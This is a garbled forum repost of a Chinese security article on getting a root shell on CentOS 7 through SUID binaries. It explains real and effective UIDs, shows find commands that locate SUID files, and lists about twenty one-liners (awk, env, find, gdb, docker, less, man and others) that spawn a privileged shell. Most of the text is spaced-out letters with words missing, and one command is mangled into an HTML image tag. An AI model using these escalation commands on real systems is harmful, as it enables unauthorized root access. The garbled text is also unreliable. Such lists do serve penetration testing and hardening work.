搜索

[15690] 2020-08-04_安全研究CentOS7系统利用suid提权获取RootShell

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-08-04_安全研究CentOS7系统利用suid提权获取RootShell   |   C e n t O S   7 s u i d R o o t   S h e l l r e g i t n e w   F r e e B u f   2 0 2 0 - 0 8 - 0 4 C e n t O S   7 s u i d r o o t   s h e l l s u i d L i n u x U I D R e a l   U I D U I D R e a l   U I D E f f e c t i v e   U I D E U I D U I D 访 E U I D R e a l   U I D E U I D S U I D E U I D U I D S a v e d   U I D U I D G I D U I D C e n t O S / b i n / c a t r o o t / e t c / s h a d o w r o o t 访 u s e r 1 U I D G I D 1 0 0 0 / b i n / c a t / e t c / s h a d o w u s e r 1 / b i n / c a t c a t R e a l   U I D E f f e c t i v e   U I D u s e r 1 U I D 1 0 0 0 c a t 访 / e t c / s h a d o w E U I D 访 访 / b i n / c a t S U I D u s e r 1 c a t E f f e c t i v e   U I D / b i n / c a t U I D r o o t U I D 0 访 / e t c / s h a d o w 访 E f f e c t i v e   U I D 0 访 s h a d o w s u i d s h e l l s h e l l E U I D U I D r o o t   s h e l l r o o t   s h e l l E U I D 0 s u i d S U I D C e n t O S   L i n u x   r e l e a s e   7 . 8 . 2 0 0 3   ( C o r e ) s u i d / s g i d
c h m o d   u + s   p r o g 1     / / p r o g 1 s u i d c h m o d   g + s   p r o g 2     / / p r o g 2 s g i d s u i d / s g i d f i n d   /   - p e r m   - u = s   - t y p e   f   2 > / d e v / n u l l     / / s u i d f i n d   /   - p e r m   - g = s   - t y p e   f   2 > / d e v / n u l l     / / s g i d r o o t s u i d 1 a w k a w k   B E G I N   { s y s t e m ( / b i n / b a s h   - p ) } r o o t   s h e l l 2 b a s h b a s h   - p r o o t   s h e l l 3 c s h c s h   - b r o o t   s h e l l
4 d m e s g d m e s g   - H ! / b i n / s h   - p r o o t   s h e l l 5 d o c k e r d o c k e r   r u n   - v   / : / m n t   r m   - i t   a l p i n e   c h r o o t   / m n t   s h r o o t   s h e l l 6 e d e d ! / b i n / s h   - p
r o o t   s h e l l 7 e n v e n v   / b i n / s h   - p r o o t   s h e l l 8 e x p e c t e x p e c t   - c   s p a w n   / b i n / s h   - p ; i n t e r a c t r o o t   s h e l l 9 f i n d f i n d   .   - e x e c   / b i n / s h   - p   ;   - q u i t
r o o t   s h e l l 1 0 f l o c k f l o c k   - u   /   / b i n / s h   - p r o o t   s h e l l 1 1 f t p f t p ! / b i n / s h   - p r o o t   s h e l l 1 2 g d b g d b   - n x   - e x   p y t h o n   i m p o r t   o s ;   o s . e x e c l ( / b i n / s h ,   s h ,   - p )   - e x   q u i t
r o o t   s h e l l 1 3 g i m p g i m p   - i d f   b a t c h - i n t e r p r e t e r = p y t h o n - f u - e v a l   - b   i m p o r t   o s ;   o s . e x e c l ( / b i n / s h ,   s h ,   - p ) r o o t   s h e l l 1 4 g i t g i t   h e l p   s t a t u s     / / ! / b i n / s h   - p
s h e l l r o o t   s h e l l 1 5   i o n i c e i o n i c e   / b i n / s h   - p r o o t   s h e l l 1 6 i p i p   n e t n s   a d d   f o o i p   n e t n s   e x e c   f o o   / b i n / s h   - p
i p   n e t n s   d e l e t e   f o o r o o t   s h e l l 1 7   k s h k s h   - p r o o t   s h e l l 1 8 l e s s l e s s   / e t c / p r o f i l e     / / ! / b i n / s h   - p
s h e l l r o o t   s h e l l 1 9 l o g s a v e l o g s a v e   / d e v / n u l l   / b i n / s h   - i   - p r o o t   s h e l l 2 0 m a k e C O M M A N D = / b i n / s h   - p
m a k e   - s   e v a l = < i m g   s r c = " h t t p s : / / c h a r t . g o o g l e a p i s . c o m / c h a r t ? c h t = t x & c h l = ' x % 3 A % 5 C n % 5 C t - ' % 2 2 "   a l t = " ' x : n t - ' " " = " " > C O M M A N D r o o t   s h e l l 2 1 m a n m a n   m a n     / / ! / b i n / s h   - p s h e l l r o o t   s h e l l 2 2 m o r e m o r e   / e t c / p r o f i l e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理